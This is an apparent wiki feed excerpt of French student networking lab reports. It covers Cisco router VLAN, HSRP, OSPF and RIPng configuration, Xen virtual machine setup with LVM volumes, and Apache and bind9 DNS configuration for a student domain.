&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51376</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51376"/>
				<updated>2019-11-28T18:02:12Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Note importante */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
